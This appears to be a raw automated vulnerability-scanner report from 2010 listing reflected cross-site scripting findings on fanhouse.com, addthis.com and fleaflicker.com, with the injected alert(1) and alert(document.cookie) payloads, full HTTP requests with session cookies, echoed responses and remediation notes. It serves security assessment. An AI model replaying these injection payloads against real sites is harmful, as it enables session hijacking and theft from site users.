GET /_uac11e67"><script>alert(1)</script>836c71c6c8f/adpage.html HTTP/1.1 Host: nfl.fanhouse.com Proxy-Connection: keep-alive Referer: http://nfl.fanhouse.com/2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/?abde7%22-alert(document.cookie)-%22af24ef3c633=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_pers=%20s_getnr%3D1292521248881-New%7C1355593248881%3B%20s_nrgvo%3DNew%7C1355593248883%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eb08"-alert(1)-"72e4381cc30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_uac5eb08"-alert(1)-"72e4381cc30/adpage.html HTTP/1.1 Host: nfl.fanhouse.com Proxy-Connection: keep-alive Referer: http://nfl.fanhouse.com/2010/12/15/roger-goodell-decision-close-on-brett-favre-jenn-sterger-scanda/?abde7%22-alert(document.cookie)-%22af24ef3c633=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_pers=%20s_getnr%3D1292521248881-New%7C1355593248881%3B%20s_nrgvo%3DNew%7C1355593248883%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46078"-alert(1)-"cd2da2790c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /crossdomain.xml46078"-alert(1)-"cd2da2790c4 HTTP/1.1 Host: nfl.fanhouse.com Proxy-Connection: keep-alive Referer: http://www.aolcdn.com/sportsdata/redesign/scorecard/ver11/minireskin.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a607"><script>alert(1)</script>a6c30c4b816 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /crossdomain.xml5a607"><script>alert(1)</script>a6c30c4b816 HTTP/1.1 Host: nfl.fanhouse.com Proxy-Connection: keep-alive Referer: http://www.aolcdn.com/sportsdata/redesign/scorecard/ver11/minireskin.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; s_pers=%20s_getnr%3D1292520945616-New%7C1355592945616%3B%20s_nrgvo%3DNew%7C1355592945618%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cc5c"-alert(1)-"0db8511b546 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /event-service3cc5c"-alert(1)-"0db8511b546/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8b1c"><script>alert(1)</script>6207525d372 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event-serviceb8b1c"><script>alert(1)</script>6207525d372/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbee0"><script>alert(1)</script>c260551d379 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trafficdbee0"><script>alert(1)</script>c260551d379/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13849"-alert(1)-"d1c72351b07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /traffic13849"-alert(1)-"d1c72351b07/ HTTP/1.1 Host: nfl.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521643141-New%7C1355593643141%3B%20s_nrgvo%3DNew%7C1355593643142%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee753<script>alert(1)</script>3598449dc2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.phpee753<script>alert(1)</script>3598449dc2a HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 18:19:27 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=8jhvef9b1rfar346r540vpb5m4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.phpee753<script>alert(1)</script>3598449dc2a</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be353"-alert(1)-"0ddc5944321 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phpbe353"-alert(1)-"0ddc5944321 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.0 404 Not Found Date: Thu, 16 Dec 2010 18:19:27 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=cjcu9v91n8hrrnpf22jivokln5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phpbe353"-alert(1)-"0ddc5944321"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
2.55. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0f00"-alert(1)-"4219d71b657 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/e0f00"-alert(1)-"4219d71b657 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 18:19:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 91760
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/e0f00"-alert(1)-"4219d71b657"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b44ce"-alert(1)-"cc2489e18f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/16b44ce"-alert(1)-"cc2489e18f3/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/ HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e23a6"><a%20b%3dc>4f2874815bc was submitted in the REST URL parameter 3. This input was echoed as e23a6"><a b=c>4f2874815bc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2010/12/16e23a6"><a%20b%3dc>4f2874815bc/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/ HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: s_pers=%20s_getnr%3D1292521389573-New%7C1355593389573%3B%20s_nrgvo%3DNew%7C1355593389576%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; CUNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503; UNAUTHID=1.a3e245dc093a11e0833807d6aee4df22.0503;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="referer" value="http://www.fanhouse.com:1080/2010/12/16e23a6"><a b=c>4f2874815bc/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/"> ...[SNIP]...
2.58. http://www.fanhouse.com/2010/12/16/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c64f"><script>alert(1)</script>59f8ffec8bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/16/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/?3c64f"><script>alert(1)</script>59f8ffec8bd=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.fanhouse.com/2010/12/16/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/?3c64f"><script>alert(1)</script>59f8ffec8bd=1"/> ...[SNIP]...
2.59. http://www.fanhouse.com/2010/12/16/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b56d"-alert(1)-"af7479a8180 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/16/jeff-hardy-lashes-out-against-reports-he-was-unfit-to-wrestle/?1b56d"-alert(1)-"af7479a8180=1 HTTP/1.1 Host: www.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1ad1'%3balert(1)//d9eff0dc659 was submitted in the REST URL parameter 1. This input was echoed as a1ad1';alert(1)//d9eff0dc659 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /_uaca1ad1'%3balert(1)//d9eff0dc659/adpage.html HTTP/1.1 Host: www.fleaflicker.com Proxy-Connection: keep-alive Referer: http://www.fleaflicker.com/nfl/news Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_getnr%3D1292523990132-New%7C1355595990132%3B%20s_nrgvo%3DNew%7C1355595990135%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; timeZoneOffset=300
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:41 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 ntCoent-Length: 4767 Content-Length: 4767
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1deec'%3balert(1)//b12fa031508 was submitted in the REST URL parameter 1. This input was echoed as 1deec';alert(1)//b12fa031508 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about1deec'%3balert(1)//b12fa031508 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:58 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4750 Keep-Alive: timeout=5, max=60 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98e32'%3balert(1)//739a115d201 was submitted in the REST URL parameter 1. This input was echoed as 98e32';alert(1)//739a115d201 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /celeb98e32'%3balert(1)//739a115d201/most-added-dropped HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:16 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4769 Keep-Alive: timeout=5, max=5 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3591'%3balert(1)//02d4378a20f was submitted in the REST URL parameter 2. This input was echoed as d3591';alert(1)//02d4378a20f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /celeb/most-added-droppedd3591'%3balert(1)//02d4378a20f HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:17 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4810 Keep-Alive: timeout=5, max=20 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd2a'%3balert(1)//a805c30c62b was submitted in the REST URL parameter 1. This input was echoed as cdd2a';alert(1)//a805c30c62b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /celebcdd2a'%3balert(1)//a805c30c62b/news HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:11 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4755 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4841'%3balert(1)//fab326e2cad was submitted in the REST URL parameter 2. This input was echoed as f4841';alert(1)//fab326e2cad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /celeb/newsf4841'%3balert(1)//fab326e2cad HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:11 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4796 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49150'%3balert(1)//95a2948c48c was submitted in the REST URL parameter 1. This input was echoed as 49150';alert(1)//95a2948c48c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact49150'%3balert(1)//95a2948c48c HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:27:46 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4752 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c887b'%3balert(1)//a1abe3adb68 was submitted in the REST URL parameter 1. This input was echoed as c887b';alert(1)//a1abe3adb68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /copyrightc887b'%3balert(1)//a1abe3adb68 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 18:28:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 4754 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf14b'%3balert(1)//37315752510 was submitted in the REST URL parameter 1. This input was echoed as cf14b';alert(1)//37315752510 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumscf14b'%3balert(1)//37315752510 HTTP/1.1 Host: www.fleaflicker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
